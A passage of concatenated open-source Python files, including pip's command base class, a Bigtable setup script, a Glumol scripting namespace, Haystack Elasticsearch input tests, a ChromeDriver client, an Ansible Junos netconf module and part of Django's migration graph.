'usage': self.usage,
'prog': '%s %s' % (get_prog(), self.name),
'formatter': UpdatingDefaultsHelpFormatter(),
'add_help_option': False,
'name': self.name,
'description': self.__doc__,
'isolated': isolated,
}
self.parser = ConfigOptionParser(**parser_kw)
# Commands should add options to this option group
optgroup_name = '%s Options' % self.name.capitalize()
self.cmd_opts = optparse.OptionGroup(self.parser, optgroup_name)
# Add the general options
gen_opts = cmdoptions.make_option_group(
cmdoptions.general_group,
self.parser,
)
self.parser.add_option_group(gen_opts)
def _build_session(self, options, retries=None, timeout=None):
session = PipSession(
cache=(
normalize_path(os.path.join(options.cache_dir, "http"))
if options.cache_dir else None
),
retries=retries if retries is not None else options.retries,
insecure_hosts=options.trusted_hosts,
)
# Handle custom ca-bundles from the user
if options.cert:
session.verify = options.cert
# Handle SSL client certificate
if options.client_cert:
session.cert = options.client_cert
# Handle timeouts
if options.timeout or timeout:
session.timeout = (
timeout if timeout is not None else options.timeout
)
# Handle configured proxies
if options.proxy:
session.proxies = {
"http": options.proxy,
"https": options.proxy,
}
# Determine if we can prompt the user for authentication or not
session.auth.prompting = not options.no_input
return session
def parse_args(self, args):
# factored out for testability
return self.parser.parse_args(args)
def main(self, args):
options, args = self.parse_args(args)
if options.quiet:
if options.quiet == 1:
level = "WARNING"
if options.quiet == 2:
level = "ERROR"
else:
level = "CRITICAL"
elif options.verbose:
level = "DEBUG"
else:
level = "INFO"
# The root logger should match the "console" level *unless* we
# specified "--log" to send debug logs to a file.
root_level = level
if options.log:
root_level = "DEBUG"
logging_dictConfig({
"version": 1,
"disable_existing_loggers": False,
"filters": {
"exclude_warnings": {
"()": "pip.utils.logging.MaxLevelFilter",
"level": logging.WARNING,
},
},
"formatters": {
"indent": {
"()": IndentingFormatter,
"format": "%(message)s",
},
},
"handlers": {
"console": {
"level": level,
"class": "pip.utils.logging.ColorizedStreamHandler",
"stream": self.log_streams[0],
"filters": ["exclude_warnings"],
"formatter": "indent",
},
"console_errors": {
"level": "WARNING",
"class": "pip.utils.logging.ColorizedStreamHandler",
"stream": self.log_streams[1],
"formatter": "indent",
},
"user_log": {
"level": "DEBUG",
"class": "pip.utils.logging.BetterRotatingFileHandler",
"filename": options.log or "/dev/null",
"delay": True,
"formatter": "indent",
},
},
"root": {
"level": root_level,
"handlers": list(filter(None, [
"console",
"console_errors",
"user_log" if options.log else None,
])),
},
# Disable any logging besides WARNING unless we have DEBUG level
# logging enabled. These use both pip._vendor and the bare names
# for the case where someone unbundles our libraries.
"loggers": dict(
(
name,
{
"level": (
"WARNING"
if level in ["INFO", "ERROR"]
else "DEBUG"
),
},
)
for name in ["pip._vendor", "distlib", "requests", "urllib3"]
),
})
if sys.version_info[:2] == (2, 6):
warnings.warn(
"Python 2.6 is no longer supported by the Python core team, "
"please upgrade your Python. A future version of pip will "
"drop support for Python 2.6",
deprecation.Python26DeprecationWarning
)
# TODO: try to get these passing down from the command?
# without resorting to os.environ to hold these.
if options.no_input:
os.environ['PIP_NO_INPUT'] = '1'
if options.exists_action:
os.environ['PIP_EXISTS_ACTION'] = ' '.join(options.exists_action)
if options.require_venv:
# If a venv is required check if it can really be found
if not running_under_virtualenv():
logger.critical(
'Could not find an activated virtualenv (required).'
)
sys.exit(VIRTUALENV_NOT_FOUND)
try:
status = self.run(options, args)
# FIXME: all commands should return an exit status
# and when it is done, isinstance is not needed anymore
if isinstance(status, int):
return status
except PreviousBuildDirError as exc:
logger.critical(str(exc))
logger.debug('Exception information:', exc_info=True)
return PREVIOUS_BUILD_DIR_ERROR
except (InstallationError, UninstallationError, BadCommand) as exc:
logger.critical(str(exc))
logger.debug('Exception information:', exc_info=True)
return ERROR
except CommandError as exc:
logger.critical('ERROR: %s', exc)
logger.debug('Exception information:', exc_info=True)
return ERROR
except KeyboardInterrupt:
logger.critical('Operation cancelled by user')
logger.debug('Exception information:', exc_info=True)
return ERROR
except:
logger.critical('Exception:', exc_info=True)
return UNKNOWN_ERROR
finally:
# Check if we're using the latest version of pip available
if (not options.disable_pip_version_check and not
getattr(options, "no_index", False)):
with self._build_session(
options,
retries=0,
timeout=min(5, options.timeout)) as session:
pip_version_check(session)
return SUCCESS
class RequirementCommand(Command):
@staticmethod
def populate_requirement_set(requirement_set, args, options, finder,
session, name, wheel_cache):
"""
Marshal cmd line args into a requirement set.
"""
for filename in options.constraints:
for req in parse_requirements(
filename,
constraint=True, finder=finder, options=options,
session=session, wheel_cache=wheel_cache):
requirement_set.add_requirement(req)
for req in args:
requirement_set.add_requirement(
InstallRequirement.from_line(
req, None, isolated=options.isolated_mode,
wheel_cache=wheel_cache
)
)
for req in options.editables:
requirement_set.add_requirement(
InstallRequirement.from_editable(
req,
default_vcs=options.default_vcs,
isolated=options.isolated_mode,
wheel_cache=wheel_cache
)
)
found_req_in_file = False
for filename in options.requirements:
for req in parse_requirements(
filename,
finder=finder, options=options, session=session,
wheel_cache=wheel_cache):
found_req_in_file = True
requirement_set.add_requirement(req)
# If --require-hashes was a line in a requirements file, tell
# RequirementSet about it:
requirement_set.require_hashes = options.require_hashes
if not (args or options.editables or found_req_in_file):
opts = {'name': name}
if options.find_links:
msg = ('You must give at least one requirement to '
'%(name)s (maybe you meant "pip %(name)s '
'%(links)s"?)' %
dict(opts, links=' '.join(options.find_links)))
else:
msg = ('You must give at least one requirement '
'to %(name)s (see "pip help %(name)s")' % opts)
logger.warning(msg)
def _build_package_finder(self, options, session):
"""
Create a package finder appropriate to this requirement command.
"""
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.info('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
return PackageFinder(
find_links=options.find_links,
format_control=options.format_control,
index_urls=index_urls,
trusted_hosts=options.trusted_hosts,
allow_all_prereleases=options.pre,
process_dependency_links=options.process_dependency_links,
session=session,
)
| bsd-2-clause |
jgeewax/gcloud-python | bigtable/setup.py | 3 | 2126 | # Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from setuptools import find_packages
from setuptools import setup
PACKAGE_ROOT = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(PACKAGE_ROOT, 'README.rst')) as file_obj:
README = file_obj.read()
# NOTE: This is duplicated throughout and we should try to
# consolidate.
SETUP_BASE = {
'author': 'Google Cloud Platform',
'author_email': 'jjg+google-cloud-python@google.com',
'scripts': [],
'url': 'https://github.com/GoogleCloudPlatform/google-cloud-python',
'license': 'Apache 2.0',
'platforms': 'Posix; MacOS X; Windows',
'include_package_data': True,
'zip_safe': False,
'classifiers': [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Internet',
],
}
REQUIREMENTS = [
'google-cloud-core >= 0.22.1, < 0.23dev',
'grpcio >= 1.0.2, < 2.0dev',
]
setup(
name='google-cloud-bigtable',
version='0.22.0',
description='Python Client for Google Cloud Bigtable',
long_description=README,
namespace_packages=[
'google',
'google.cloud',
],
packages=find_packages(),
install_requires=REQUIREMENTS,
**SETUP_BASE
)
| apache-2.0 |
lebauce/artub | glumolnamespace.py | 1 | 3055 | # Glumol - An adventure game creator
# Copyright (C) 1998-2008 Sylvain Baubeau & Alexis Contour
# This file is part of Glumol.
# Glumol is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# Glumol is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Glumol. If not, see <http://www.gnu.org/licenses/>.
import sys
from pypoujol import *
from new import instancemethod
from log import log
from behaviour import *
from script import get_full_name
class GlumolNamespace:
def __init__(self):
self.globals = dict(globals())
self.locals = { }
def clear(self):
# self.globals = dict(globals())
# self.locals = { }
pass
def get_value(self, name):
return self.globals[name]
def call(self, func, args):
self.locals["func"] = func
self.locals["args"] = args
exec "func(*args)" in self.locals, self.locals
del self.locals["func"]
del self.locals["args"]
def eval(self, listing):
return eval(listing, self.globals, self.locals)
def run(self, listing, module = __name__, globs = None, locs = None):
if not globs:
globs = self.globals
if not locs:
locs = self.globals
globs["__name__"] = module
exec listing in globs, locs
globs["__name__"] = "glumolnamespace"
def getattr(self, name, *defaults):
attrs = name.split('.')
try: o = self.globals[attrs[0]]
except:
if len(defaults):
try: o = self.locals[attrs[0]]
except: o = defaults[0]
else: o = self.locals[attrs[0]]
for i in attrs[1:]:
o = getattr(o, i, None)
return o
def create_object(self, classe, loc = None, args = tuple() ):
if loc == None:
loc = self.locals
loc["classe"] = classe
loc["args"] = args
s = "classe(*args)"
self.obj = newobj = eval(s, self.globals, self.locals)
del loc["args"]
del loc["classe"]
return newobj
def create_from_script(self, script, args = tuple() ):
self.run(script.listing)
try:
classe = self.getattr(script.realname)
if not classe: raise
except:
try:
classe = self.getattr(script.name)
if not classe: raise
except:
classe = self.getattr(get_full_name(script.name))
return self.create_object(classe, None, args)
| gpl-2.0 |
josesanch/django-haystack | tests/elasticsearch_tests/tests/inputs.py | 10 | 3525 | from django.test import TestCase
from haystack import connections
from haystack import inputs
class ElasticsearchInputTestCase(TestCase):
def setUp(self):
super(ElasticsearchInputTestCase, self).setUp()
self.query_obj = connections['default'].get_query()
def test_raw_init(self):
raw = inputs.Raw('hello OR there, :you')
self.assertEqual(raw.query_string, 'hello OR there, :you')
self.assertEqual(raw.kwargs, {})
self.assertEqual(raw.post_process, False)
raw = inputs.Raw('hello OR there, :you', test='really')
self.assertEqual(raw.query_string, 'hello OR there, :you')
self.assertEqual(raw.kwargs, {'test': 'really'})
self.assertEqual(raw.post_process, False)
def test_raw_prepare(self):
raw = inputs.Raw('hello OR there, :you')
self.assertEqual(raw.prepare(self.query_obj), 'hello OR there, :you')
def test_clean_init(self):
clean = inputs.Clean('hello OR there, :you')
self.assertEqual(clean.query_string, 'hello OR there, :you')
self.assertEqual(clean.post_process, True)
def test_clean_prepare(self):
clean = inputs.Clean('hello OR there, :you')
self.assertEqual(clean.prepare(self.query_obj), 'hello or there, \\:you')
def test_exact_init(self):
exact = inputs.Exact('hello OR there, :you')
self.assertEqual(exact.query_string, 'hello OR there, :you')
self.assertEqual(exact.post_process, True)
def test_exact_prepare(self):
exact = inputs.Exact('hello OR there, :you')
self.assertEqual(exact.prepare(self.query_obj), u'"hello OR there, :you"')
exact = inputs.Exact('hello OR there, :you', clean=True)
self.assertEqual(exact.prepare(self.query_obj), u'"hello or there, \\:you"')
def test_not_init(self):
not_it = inputs.Not('hello OR there, :you')
self.assertEqual(not_it.query_string, 'hello OR there, :you')
self.assertEqual(not_it.post_process, True)
def test_not_prepare(self):
not_it = inputs.Not('hello OR there, :you')
self.assertEqual(not_it.prepare(self.query_obj), u'NOT (hello or there, \\:you)')
def test_autoquery_init(self):
autoquery = inputs.AutoQuery('panic -don\'t "froody dude"')
self.assertEqual(autoquery.query_string, 'panic -don\'t "froody dude"')
self.assertEqual(autoquery.post_process, False)
def test_autoquery_prepare(self):
autoquery = inputs.AutoQuery('panic -don\'t "froody dude"')
self.assertEqual(autoquery.prepare(self.query_obj), u'panic NOT don\'t "froody dude"')
def test_altparser_init(self):
altparser = inputs.AltParser('dismax')
self.assertEqual(altparser.parser_name, 'dismax')
self.assertEqual(altparser.query_string, '')
self.assertEqual(altparser.kwargs, {})
self.assertEqual(altparser.post_process, False)
altparser = inputs.AltParser('dismax', 'douglas adams', qf='author', mm=1)
self.assertEqual(altparser.parser_name, 'dismax')
self.assertEqual(altparser.query_string, 'douglas adams')
self.assertEqual(altparser.kwargs, {'mm': 1, 'qf': 'author'})
self.assertEqual(altparser.post_process, False)
def test_altparser_prepare(self):
altparser = inputs.AltParser('dismax', 'douglas adams', qf='author', mm=1)
self.assertEqual(altparser.prepare(self.query_obj),
u"""{!dismax mm=1 qf=author v='douglas adams'}""")
| bsd-3-clause |
ds-hwang/chromium-crosswalk | chrome/test/chromedriver/client/chromedriver.py | 7 | 12885 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import command_executor
from command_executor import Command
from webelement import WebElement
class ChromeDriverException(Exception):
pass
class NoSuchElement(ChromeDriverException):
pass
class NoSuchFrame(ChromeDriverException):
pass
class UnknownCommand(ChromeDriverException):
pass
class StaleElementReference(ChromeDriverException):
pass
class UnknownError(ChromeDriverException):
pass
class JavaScriptError(ChromeDriverException):
pass
class XPathLookupError(ChromeDriverException):
pass
class NoSuchWindow(ChromeDriverException):
pass
class InvalidCookieDomain(ChromeDriverException):
pass
class ScriptTimeout(ChromeDriverException):
pass
class InvalidSelector(ChromeDriverException):
pass
class SessionNotCreatedException(ChromeDriverException):
pass
class NoSuchSession(ChromeDriverException):
pass
class UnexpectedAlertOpen(ChromeDriverException):
pass
def _ExceptionForResponse(response):
exception_class_map = {
6: NoSuchSession,
7: NoSuchElement,
8: NoSuchFrame,
9: UnknownCommand,
10: StaleElementReference,
13: UnknownError,
17: JavaScriptError,
19: XPathLookupError,
23: NoSuchWindow,
24: InvalidCookieDomain,
26: UnexpectedAlertOpen,
28: ScriptTimeout,
32: InvalidSelector,
33: SessionNotCreatedException
}
status = response['status']
msg = response['value']['message']
return exception_class_map.get(status, ChromeDriverException)(msg)
class ChromeDriver(object):
"""Starts and controls a single Chrome instance on this machine."""
def __init__(self, server_url, chrome_binary=None, android_package=None,
android_activity=None, android_process=None,
android_use_running_app=None, chrome_switches=None,
chrome_extensions=None, chrome_log_path=None,
debugger_address=None, logging_prefs=None,
mobile_emulation=None, experimental_options=None,
download_dir=None):
self._executor = command_executor.CommandExecutor(server_url)
options = {}
if experimental_options:
assert isinstance(experimental_options, dict)
options = experimental_options.copy()
if android_package:
options['androidPackage'] = android_package
if android_activity:
options['androidActivity'] = android_activity
if android_process:
options['androidProcess'] = android_process
if android_use_running_app:
options['androidUseRunningApp'] = android_use_running_app
elif chrome_binary:
options['binary'] = chrome_binary
if chrome_switches:
assert type(chrome_switches) is list
options['args'] = chrome_switches
if mobile_emulation:
assert type(mobile_emulation) is dict
options['mobileEmulation'] = mobile_emulation
if chrome_extensions:
assert type(chrome_extensions) is list
options['extensions'] = chrome_extensions
if chrome_log_path:
assert type(chrome_log_path) is str
options['logPath'] = chrome_log_path
if debugger_address:
assert type(debugger_address) is str
options['debuggerAddress'] = debugger_address
if logging_prefs:
assert type(logging_prefs) is dict
log_types = ['client', 'driver', 'browser', 'server', 'performance']
log_levels = ['ALL', 'DEBUG', 'INFO', 'WARNING', 'SEVERE', 'OFF']
for log_type, log_level in logging_prefs.iteritems():
assert log_type in log_types
assert log_level in log_levels
else:
logging_prefs = {}
download_prefs = {}
if download_dir:
if 'prefs' not in options:
options['prefs'] = {}
if 'download' not in options['prefs']:
options['prefs']['download'] = {}
options['prefs']['download']['default_directory'] = download_dir
params = {
'desiredCapabilities': {
'chromeOptions': options,
'loggingPrefs': logging_prefs
}
}
response = self._ExecuteCommand(Command.NEW_SESSION, params)
self._session_id = response['sessionId']
self.capabilities = self._UnwrapValue(response['value'])
def _WrapValue(self, value):
"""Wrap value from client side for chromedriver side."""
if isinstance(value, dict):
converted = {}
for key, val in value.items():
converted[key] = self._WrapValue(val)
return converted
elif isinstance(value, WebElement):
return {'ELEMENT': value._id}
elif isinstance(value, list):
return list(self._WrapValue(item) for item in value)
else:
return value
def _UnwrapValue(self, value):
"""Unwrap value from chromedriver side for client side."""
if isinstance(value, dict):
if (len(value) == 1 and 'ELEMENT' in value
and isinstance(value['ELEMENT'], basestring)):
return WebElement(self, value['ELEMENT'])
else:
unwraped = {}
for key, val in value.items():
unwraped[key] = self._UnwrapValue(val)
return unwraped
elif isinstance(value, list):
return list(self._UnwrapValue(item) for item in value)
else:
return value
def _ExecuteCommand(self, command, params={}):
params = self._WrapValue(params)
response = self._executor.Execute(command, params)
if response['status'] != 0:
raise _ExceptionForResponse(response)
return response
def ExecuteCommand(self, command, params={}):
params['sessionId'] = self._session_id
response = self._ExecuteCommand(command, params)
return self._UnwrapValue(response['value'])
def GetWindowHandles(self):
return self.ExecuteCommand(Command.GET_WINDOW_HANDLES)
def SwitchToWindow(self, handle_or_name):
self.ExecuteCommand(Command.SWITCH_TO_WINDOW, {'name': handle_or_name})
def GetCurrentWindowHandle(self):
return self.ExecuteCommand(Command.GET_CURRENT_WINDOW_HANDLE)
def CloseWindow(self):
self.ExecuteCommand(Command.CLOSE)
def Load(self, url):
self.ExecuteCommand(Command.GET, {'url': url})
def LaunchApp(self, app_id):
self.ExecuteCommand(Command.LAUNCH_APP, {'id': app_id})
def ExecuteScript(self, script, *args):
converted_args = list(args)
return self.ExecuteCommand(
Command.EXECUTE_SCRIPT, {'script': script, 'args': converted_args})
def ExecuteAsyncScript(self, script, *args):
converted_args = list(args)
return self.ExecuteCommand(
Command.EXECUTE_ASYNC_SCRIPT,
{'script': script, 'args': converted_args})
def SwitchToFrame(self, id_or_name):
self.ExecuteCommand(Command.SWITCH_TO_FRAME, {'id': id_or_name})
def SwitchToFrameByIndex(self, index):
self.SwitchToFrame(index)
def SwitchToMainFrame(self):
self.SwitchToFrame(None)
def SwitchToParentFrame(self):
self.ExecuteCommand(Command.SWITCH_TO_PARENT_FRAME)
def GetSessions(self):
return self.ExecuteCommand(Command.GET_SESSIONS)
def GetTitle(self):
return self.ExecuteCommand(Command.GET_TITLE)
def GetPageSource(self):
return self.ExecuteCommand(Command.GET_PAGE_SOURCE)
def FindElement(self, strategy, target):
return self.ExecuteCommand(
Command.FIND_ELEMENT, {'using': strategy, 'value': target})
def FindElements(self, strategy, target):
return self.ExecuteCommand(
Command.FIND_ELEMENTS, {'using': strategy, 'value': target})
def SetTimeout(self, type, timeout):
return self.ExecuteCommand(
Command.SET_TIMEOUT, {'type' : type, 'ms': timeout})
def GetCurrentUrl(self):
return self.ExecuteCommand(Command.GET_CURRENT_URL)
def GoBack(self):
return self.ExecuteCommand(Command.GO_BACK)
def GoForward(self):
return self.ExecuteCommand(Command.GO_FORWARD)
def Refresh(self):
return self.ExecuteCommand(Command.REFRESH)
def MouseMoveTo(self, element=None, x_offset=None, y_offset=None):
params = {}
if element is not None:
params['element'] = element._id
if x_offset is not None:
params['xoffset'] = x_offset
if y_offset is not None:
params['yoffset'] = y_offset
self.ExecuteCommand(Command.MOUSE_MOVE_TO, params)
def MouseClick(self, button=0):
self.ExecuteCommand(Command.MOUSE_CLICK, {'button': button})
def MouseButtonDown(self, button=0):
self.ExecuteCommand(Command.MOUSE_BUTTON_DOWN, {'button': button})
def MouseButtonUp(self, button=0):
self.ExecuteCommand(Command.MOUSE_BUTTON_UP, {'button': button})
def MouseDoubleClick(self, button=0):
self.ExecuteCommand(Command.MOUSE_DOUBLE_CLICK, {'button': button})
def TouchDown(self, x, y):
self.ExecuteCommand(Command.TOUCH_DOWN, {'x': x, 'y': y})
def TouchUp(self, x, y):
self.ExecuteCommand(Command.TOUCH_UP, {'x': x, 'y': y})
def TouchMove(self, x, y):
self.ExecuteCommand(Command.TOUCH_MOVE, {'x': x, 'y': y})
def TouchScroll(self, element, xoffset, yoffset):
params = {'element': element._id, 'xoffset': xoffset, 'yoffset': yoffset}
self.ExecuteCommand(Command.TOUCH_SCROLL, params)
def TouchFlick(self, element, xoffset, yoffset, speed):
params = {
'element': element._id,
'xoffset': xoffset,
'yoffset': yoffset,
'speed': speed
}
self.ExecuteCommand(Command.TOUCH_FLICK, params)
def TouchPinch(self, x, y, scale):
params = {'x': x, 'y': y, 'scale': scale}
self.ExecuteCommand(Command.TOUCH_PINCH, params)
def GetCookies(self):
return self.ExecuteCommand(Command.GET_COOKIES)
def AddCookie(self, cookie):
self.ExecuteCommand(Command.ADD_COOKIE, {'cookie': cookie})
def DeleteCookie(self, name):
self.ExecuteCommand(Command.DELETE_COOKIE, {'name': name})
def DeleteAllCookies(self):
self.ExecuteCommand(Command.DELETE_ALL_COOKIES)
def IsAlertOpen(self):
return self.ExecuteCommand(Command.GET_ALERT)
def GetAlertMessage(self):
return self.ExecuteCommand(Command.GET_ALERT_TEXT)
def HandleAlert(self, accept, prompt_text=''):
if prompt_text:
self.ExecuteCommand(Command.SET_ALERT_VALUE, {'text': prompt_text})
if accept:
cmd = Command.ACCEPT_ALERT
else:
cmd = Command.DISMISS_ALERT
self.ExecuteCommand(cmd)
def IsLoading(self):
return self.ExecuteCommand(Command.IS_LOADING)
def GetWindowPosition(self):
position = self.ExecuteCommand(Command.GET_WINDOW_POSITION,
{'windowHandle': 'current'})
return [position['x'], position['y']]
def SetWindowPosition(self, x, y):
self.ExecuteCommand(Command.SET_WINDOW_POSITION,
{'windowHandle': 'current', 'x': x, 'y': y})
def GetWindowSize(self):
size = self.ExecuteCommand(Command.GET_WINDOW_SIZE,
{'windowHandle': 'current'})
return [size['width'], size['height']]
def SetWindowSize(self, width, height):
self.ExecuteCommand(
Command.SET_WINDOW_SIZE,
{'windowHandle': 'current', 'width': width, 'height': height})
def MaximizeWindow(self):
self.ExecuteCommand(Command.MAXIMIZE_WINDOW, {'windowHandle': 'current'})
def Quit(self):
"""Quits the browser and ends the session."""
self.ExecuteCommand(Command.QUIT)
def GetLog(self, type):
return self.ExecuteCommand(Command.GET_LOG, {'type': type})
def GetAvailableLogTypes(self):
return self.ExecuteCommand(Command.GET_AVAILABLE_LOG_TYPES)
def IsAutoReporting(self):
return self.ExecuteCommand(Command.IS_AUTO_REPORTING)
def SetAutoReporting(self, enabled):
self.ExecuteCommand(Command.SET_AUTO_REPORTING, {'enabled': enabled})
def SetNetworkConditions(self, latency, download_throughput,
upload_throughput, offline=False):
# Until http://crbug.com/456324 is resolved, we'll always set 'offline' to
# False, as going "offline" will sever Chromedriver's connection to Chrome.
params = {
'network_conditions': {
'offline': offline,
'latency': latency,
'download_throughput': download_throughput,
'upload_throughput': upload_throughput
}
}
self.ExecuteCommand(Command.SET_NETWORK_CONDITIONS, params)
def SetNetworkConditionsName(self, network_name):
self.ExecuteCommand(
Command.SET_NETWORK_CONDITIONS, {'network_name': network_name})
def GetNetworkConditions(self):
conditions = self.ExecuteCommand(Command.GET_NETWORK_CONDITIONS)
return {
'latency': conditions['latency'],
'download_throughput': conditions['download_throughput'],
'upload_throughput': conditions['upload_throughput'],
'offline': conditions['offline']
}
def DeleteNetworkConditions(self):
self.ExecuteCommand(Command.DELETE_NETWORK_CONDITIONS)
| bsd-3-clause |
bsmr-ansible/ansible-modules-core | network/junos/junos_netconf.py | 25 | 3772 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = """
---
module: junos_netconf
version_added: "2.1"
author: "Peter Sprygada (@privateip)"
short_description: Configures the Junos Netconf system service
description:
- This module provides an abstraction that enables and configures
the netconf system service running on Junos devices. This module
can be used to easily enable the Netconf API. Netconf provides
a programmatic interface for working with configuration and state
resources as defined in RFC 6242.
extends_documentation_fragment: junos
options:
listens_on:
description:
- This argument specifies the port the netconf service should
listen on for SSH connections. The default port as defined
in RFC 6242 is 830.
required: true
default: 830
state:
description:
- Specifies the state of the M(junos_netconf) resource on
the remote device. If the O(state) argument is set to
I(present) the netconf service will be configured. If the
O(state) argument is set to I(absent) the netconf service
will be removed from the configuration.
required: true
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: enable netconf service on port 830
junos_netconf:
listens_on: 830
state: present
- name: disable netconf service
junos_netconf:
state: absent
"""
RETURN = """
"""
import re
def parse_port(config):
match = re.search(r'port (\d+)', config)
if match:
return int(match.group(1))
def get_instance(module):
cmd = 'show configuration system services netconf'
cfg = module.run_commands(cmd)[0]
result = dict(state='absent')
if cfg:
result = dict(state='present')
result['port'] = parse_port(cfg)
return result
def main():
"""main entry point for module execution
"""
argument_spec = dict(
listens_on=dict(type='int', default=830),
state=dict(default='present', choices=['present', 'absent']),
transport=dict(default='cli', choices=['cli'])
)
module = get_module(argument_spec=argument_spec,
supports_check_mode=True)
state = module.params['state']
port = module.params['listens_on']
result = dict(changed=False)
instance = get_instance(module)
commands = None
if state == 'present' and instance.get('state') == 'absent':
commands = 'set system services netconf ssh port %s' % port
elif state == 'absent' and instance.get('state') == 'present':
commands = 'delete system services netconf'
elif port != instance.get('port'):
commands = 'set system services netconf ssh port %s' % port
if commands:
if not module.check_mode:
comment = 'configuration updated by junos_netconf'
module.connection.configure(commands, comment=comment)
result['changed'] = True
module.exit_json(**result)
from ansible.module_utils.basic import *
from ansible.module_utils.shell import *
from ansible.module_utils.junos import *
if __name__ == '__main__':
main()
| gpl-3.0 |
henryfjordan/django | django/db/migrations/graph.py | 351 | 10956 | from __future__ import unicode_literals
import warnings
from collections import deque
from functools import total_ordering
from django.db.migrations.state import ProjectState
from django.utils.datastructures import OrderedSet
from django.utils.encoding import python_2_unicode_compatible
from .exceptions import CircularDependencyError, NodeNotFoundError
RECURSION_DEPTH_WARNING = (
"Maximum recursion depth exceeded while generating migration graph, "
"falling back to iterative approach. If you're experiencing performance issues, "
"consider squashing migrations as described at "
"https://docs.djangoproject.com/en/dev/topics/migrations/#squashing-migrations."
)
@python_2_unicode_compatible
@total_ordering
class Node(object):
"""
A single node in the migration graph. Contains direct links to adjacent
nodes in either direction.
"""
def __init__(self, key):
self.key = key
self.children = set()
self.parents = set()
def __eq__(self, other):
return self.key == other
def __lt__(self, other):
return self.key < other
def __hash__(self):
return hash(self.key)
def __getitem__(self, item):
return self.key[item]
def __str__(self):
return str(self.key)
def __repr__(self):
return '<Node: (%r, %r)>' % self.key
def add_child(self, child):
self.children.add(child)
def add_parent(self, parent):
self.parents.add(parent)
# Use manual caching, @cached_property effectively doubles the
# recursion depth for each recursion.
def ancestors(self):
# Use self.key instead of self to speed up the frequent hashing
# when constructing an OrderedSet.
if '_ancestors' not in self.__dict__:
ancestors = deque([self.key])
for parent in sorted(self.parents):
ancestors.extendleft(reversed(parent.ancestors()))
self.__dict__['_ancestors'] = list(OrderedSet(ancestors))
return self.__dict__['_ancestors']
# Use manual caching, @cached_property effectively doubles the
# recursion depth for each recursion.
def descendants(self):
# Use self.key instead of self to speed up the frequent hashing
# when constructing an OrderedSet.
if '_descendants' not in self.__dict__:
descendants = deque([self.key])
for child in sorted(self.children):
descendants.extendleft(reversed(child.descendants()))
self.__dict__['_descendants'] = list(OrderedSet(descendants))
return self.__dict__['_descendants']
@python_2_unicode_compatible
class MigrationGraph(object):
"""
Represents the digraph of all migrations in a project.
Each migration is a node, and each dependency is an edge. There are
no implicit dependencies between numbered migrations - the numbering is
merely a convention to aid file listing. Every new numbered migration
has a declared dependency to the previous number, meaning that VCS
branch merges can be detected and resolved.
Migrations files can be marked as replacing another set of migrations -
this is to support the "squash" feature. The graph handler isn't responsible
for these; instead, the code to load them in here should examine the
migration files and if the replaced migrations are all either unapplied
or not present, it should ignore the replaced ones, load in just the
replacing migration, and repoint any dependencies that pointed to the
replaced migrations to point to the replacing one.
A node should be a tuple: (app_path, migration_name). The tree special-cases
things within an app - namely, root nodes and leaf nodes ignore dependencies
to other apps.
"""
def __init__(self):
self.node_map = {}
self.nodes = {}
self.cached = False
def add_node(self, key, implementation):
node = Node(key)
self.node_map[key] = node
self.nodes[key] = implementation
self.clear_cache()
def add_dependency(self, migration, child, parent):
if child not in self.nodes:
raise NodeNotFoundError(
"Migration %s dependencies reference nonexistent child node %r" % (migration, child),
child
)
if parent not in self.nodes:
raise NodeNotFoundError(
"Migration %s dependencies reference nonexistent parent node %r" % (migration, parent),
parent
)
self.node_map[child].add_parent(self.node_map[parent])
self.node_map[parent].add_child(self.node_map[child])
self.clear_cache()
def clear_cache(self):
if self.cached:
for node in self.nodes:
self.node_map[node].__dict__.pop('_ancestors', None)
self.node_map[node].__dict__.pop('_descendants', None)
self.cached = False
def forwards_plan(self, target):
"""
Given a node, returns a list of which previous nodes (dependencies)
must be applied, ending with the node itself.
This is the list you would follow if applying the migrations to
a database.
"""
if target not in self.nodes:
raise NodeNotFoundError("Node %r not a valid node" % (target, ), target)
# Use parent.key instead of parent to speed up the frequent hashing in ensure_not_cyclic
self.ensure_not_cyclic(target, lambda x: (parent.key for parent in self.node_map[x].parents))
self.cached = True
node = self.node_map[target]
try:
return node.ancestors()
except RuntimeError:
# fallback to iterative dfs
warnings.warn(RECURSION_DEPTH_WARNING, RuntimeWarning)
return self.iterative_dfs(node)
def backwards_plan(self, target):
"""
Given a node, returns a list of which dependent nodes (dependencies)
must be unapplied, ending with the node itself.
This is the list you would follow if removing the migrations from
a database.
"""
if target not in self.nodes:
raise NodeNotFoundError("Node %r not a valid node" % (target, ), target)
# Use child.key instead of child to speed up the frequent hashing in ensure_not_cyclic
self.ensure_not_cyclic(target, lambda x: (child.key for child in self.node_map[x].children))
